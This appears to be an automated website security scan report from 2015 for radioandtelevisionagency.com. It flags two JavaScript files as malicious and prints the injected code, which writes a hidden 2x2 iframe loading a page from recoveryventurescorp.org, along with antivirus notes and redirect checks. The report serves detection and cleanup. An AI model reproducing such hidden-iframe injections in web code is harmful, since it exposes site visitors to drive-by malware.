Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=radioandtelevisionagency.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://radioandtelevisionagency.com/ | 200 OK Content-Length: 8053 Content-Type: text/html | clean |
http://radioandtelevisionagency.com/wpscripts/jsFlashVer.js | 200 OK Content-Length: 8057 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe ></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); ver break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>');
document.write('<iframe ></iframe>');
Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites.
size: 2x2
src: http://recoveryventurescorp.org/ozzi.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html>
http://radioandtelevisionagency.com/wpscripts/jspngfix.js | 200 OK Content-Length: 1002 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe ></iframe>');
var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5|6)/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase()) event.srcElement.src = blankSrc; event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "',sizingMethod='scale')"; } else { event.srcElement.runtimeStyle.filter = "";} } }
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>');
document.write('<iframe ></iframe>');
Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites.
size: 2x2
src: http://recoveryventurescorp.org/ozzi.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html>
http://radioandtelevisionagency.com/home.html | 200 OK Content-Length: 8053 Content-Type: text/html | clean |
http://radioandtelevisionagency.com/test404page.js | 404 Not Found Content-Length: 428 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: radioandtelevisionagency.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 09:51:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8053
Content-Type: text/html
...8053 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: radioandtelevisionagency.com
Referer: http://www.google.com/search?q=radioandtelevisionagency.com
Result:
The result is similar to the first query. There are no suspicious redirects found.